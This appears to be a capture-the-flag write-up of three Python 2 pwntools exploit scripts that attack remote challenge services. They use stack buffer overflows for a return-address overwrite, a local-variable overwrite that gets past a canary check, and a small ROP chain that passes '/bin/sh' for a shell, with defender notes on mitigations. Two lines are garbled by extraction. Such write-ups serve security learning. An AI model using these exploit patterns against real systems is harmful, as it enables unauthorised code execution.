pwn2
from pwn import *
# Python 2 script (str payloads are concatenated with p32() output; compare the
# bare `print addr` statement in the rop script further down).
# Local run is kept commented out; the script talks to the challenge service.
#p=process("./pwn2")
p=remote("120.77.155.249",10010)
# 22 bytes of filler, then the 32-bit address written in place of the saved
# return address. The 22-byte distance is taken from the challenge binary
# and not derived here — confirm against ./pwn2 before reusing.
payload=22 *'a'
# Address comes straight from the symbol table of the (unstripped) binary,
# so the script presumably assumes the binary is not position independent.
e=ELF("./pwn2")
addr=e.symbols["callme"]
payload+=p32(addr)
# Walk the service's prompts: answer [Y/N], then deliver the overflow at "name:".
p.sendlineafter("[Y/N]",'Y')
p.sendlineafter("name:",payload)
# Defender note: a length-bounded read of the name input is the actual fix;
# a stack protector and PIE on the binary would each also break this
# unauthenticated return-address overwrite.
p.interactive()
没做任何防护直接控制跳转
canary
覆盖参数满足条件
# NOTE(review): extraction garbled this line; the other two scripts on this
# page start with `from pwn import *`.
frompwnimport*
#p=process("./canary")
p=remote("120.77.155.249",10011)
# 10 bytes of filler, then three fixed 32-bit values. Per the writeup note
# above, these overwrite the locals that the program compares against;
# where the constants come from is not shown on this page — verify against
# the ./canary binary.
payload=10*'a'
payload+=p32(0x6b8b4567)
payload+=p32(0x123456)
payload+=p32(0x1A2B3C4D)
# NOTE(review): garbled; presumably the Python 2 statement `print len(payload)`.
printlen(payload)
p.sendlineafter("[Y/N]",'Y')
p.sendlineafter("payload",payload)
# Drain pending output before handing the session to the user.
p.recv(4096)
# Defender note: the overwrite stays below the return address, which is why a
# stack canary (if the challenge name is accurate) does not catch it — canaries
# protect the frame boundary, not adjacent locals. Bounding the input read and
# not trusting overwritable stack state for the check are the mitigations.
p.interactive()
rop
from pwn import *
# Log every byte exchanged with the service; handy when checking that the
# prompt strings used in sendlineafter() actually match.
context.log_level = "debug"
#p=process("./rop")
p=remote("120.77.155.249",12345)
# Same 22-byte distance to the saved return address as in the pwn2 script;
# taken from the binary, not derived here.
payload=22 *'a'
e=ELF("./rop")
addr=e.symbols['callme']
# Python 2 print statement (the whole page is Python 2).
print addr
# Frame layout written past the return address: callme's address, a second
# copy of it in the slot that would hold callme's own return address, then the
# address of the "/bin/sh" string found inside the binary. e.search() returns
# a generator; .next() is the Python 2 spelling of next().
payload+=p32(addr)
payload+=p32(addr)
payload+=p32(e.search("/bin/sh").next())
p.sendlineafter("[Y/N]",'Y')
p.sendlineafter("payload",payload)
# Defender note: as with pwn2, the fix is a bounded read; removing the
# "/bin/sh" string from the binary would not close the overflow itself.
p.interactive()